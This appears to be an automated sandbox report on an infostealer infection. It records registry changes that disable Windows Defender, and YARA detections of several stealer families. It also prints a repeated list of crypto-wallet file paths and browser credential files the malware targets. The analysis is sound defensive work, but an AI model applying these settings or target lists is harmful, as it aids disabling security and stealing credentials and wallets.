Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_6C63A8DC
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_009F65E0 LookupAccountNameA, 11_2_009F65E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C588390 NSS_GetVersion, 0_2_6C588390
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Registry value created: TamperProtection 0
AV process strings found (often used to terminate AV products)
Source: 0718eb7837.exe, 0718eb7837.exe, 0000000E.00000003.2783198583.000000000151C000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000002.3094604903.000000000165E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 10.2.skotes.exe.9f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.DocumentsKECFIDGCBF.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.skotes.exe.9f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2158334223.0000000000821000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2325476805.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2153154830.0000000005060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2118042916.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2193621172.00000000009F1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3080728163.00000000009F1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: 2922d7c574.exe PID: 4600, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: 0718eb7837.exe PID: 6588, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0718eb7837.exe PID: 7288, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2129788119.000000000074E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2912762087.0000000000E11000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2737911561.0000000000E11000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1709468423.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.2825521059.00000000057C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2687883624.0000000005150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2130376795.0000000000C11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7540, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: aedbd2e320.exe PID: 5956, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: aedbd2e320.exe PID: 6520, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7540, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \ElectronCash\wallets\
Source: file.exe, 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Jaxx Desktop (old)
Source: file.exe, 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: info.seco
Source: file.exe, 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: passphrase.json
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: file.exe, 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Exodus\exodus.wallet
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: file__0.localstorage
Source: file.exe, 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: MultiDoge
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: seed.seco
Source: file.exe, 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
